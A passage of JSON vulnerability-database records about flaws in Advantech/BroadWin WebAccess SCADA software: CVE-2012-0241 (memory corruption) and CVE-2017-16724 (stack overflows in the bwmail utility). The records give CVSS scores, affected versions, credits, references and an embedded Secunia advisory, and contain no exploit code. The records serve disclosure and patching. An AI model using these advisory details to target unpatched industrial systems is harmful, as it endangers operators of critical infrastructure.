"CNNVD", "id": "CNNVD-201202-417" }, { "db": "NVD", "id": "CVE-2012-0241" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001559" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0241", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2012-0241", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-53522", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0241", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-0241", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-417", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-53522", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53522" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": "CNNVD", "id": "CNNVD-201202-417" }, { "db": "NVD", "id": "CVE-2012-0241" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess before 7.0 allows remote attackers to cause a denial of service (memory corruption) via a modified stream identifier to a function. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0241" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53522" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-53522", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-53522" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0241", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-417", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0673", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001559", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19BFB8B4-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "EXPLOIT-DB", "id": "18051", "trust": 0.1 }, { "db": "EXPLOIT-DB", "id": "17772", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-72054", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-53522", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "VULHUB", "id": "VHN-53522" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-417" }, { "db": "NVD", "id": "CVE-2012-0241" } ] }, "id": "VAR-201202-0221", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "VULHUB", "id": "VHN-53522" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0673" } ] }, "last_update_date": "2024-11-23T21:46:31.606000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Arbitrary Memory Corruption Vulnerability (CNVD-2012-0673)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10431" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.1 }, { "problemtype": "CWE-20", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53522" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": "NVD", "id": "CVE-2012-0241" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73281" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0241" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0241" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "VULHUB", "id": "VHN-53522" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-417" }, { "db": "NVD", "id": "CVE-2012-0241" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "VULHUB", "id": "VHN-53522" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-417" }, { "db": "NVD", "id": "CVE-2012-0241" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0673" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53522" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-417" }, { "date": "2012-02-21T13:31:57.173000", "db": "NVD", "id": "CVE-2012-0241" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0673" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53522" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-417" }, { "date": "2024-11-21T01:34:38.803000", "db": "NVD", "id": "CVE-2012-0241" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-417" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Service disruption in ( Memory corruption ) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001559" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-417" } ], "trust": 0.8 } }
var-201801-0151
Vulnerability from variot
A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 9.1, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.6, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-023" }, { "db": "CNVD", "id": "CNVD-2018-00671" }, { "db": "BID", "id": "102424" }, { "db": "CNNVD", "id": "CNNVD-201801-242" }, { "db": "NVD", "id": "CVE-2017-16724" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-023" } ], "trust": 9.1 }, "cve": "CVE-2017-16724", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2017-16724", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 8.4, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-16724", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-16724", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2018-00671", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-16724", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2017-16724", "trust": 8.4, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2017-16724", "trust": 1.0, "value": "CRITICAL" }, { "author": "ZDI", "id": "CVE-2017-16724", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2018-00671", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201801-242", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1", "trust": 0.2, "value": "CRITICAL" } ] } ], "sources": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-023" }, { "db": "CNVD", "id": "CNVD-2018-00671" }, { "db": "CNNVD", "id": "CNNVD-201801-242" }, { "db": "NVD", "id": "CVE-2017-16724" } ] }, "description": { "_id": null, "data": "A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple denial-of-service vulnerabilities\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. A directory-traversal vulnerability\n4. An SQL-injection vulnerability\n5. Failed attacks will cause denial of service conditions. \nversions prior to Advantech WebAccess 8.3 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-16724" }, { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-023" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "CNVD", "id": "CNVD-2018-00671" }, { "db": "BID", "id": "102424" }, { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" } ], "trust": 10.08 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-16724", "trust": 11.8 }, { "db": "BID", "id": "102424", "trust": 2.5 }, { "db": "ICS CERT", "id": "ICSA-18-004-02", "trust": 1.9 }, { "db": "CNVD", "id": "CNVD-2018-00671", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201801-242", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5045", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-044", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5052", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-050", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5054", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-053", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5064", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-061", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4993", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-025", "trust": 0.7 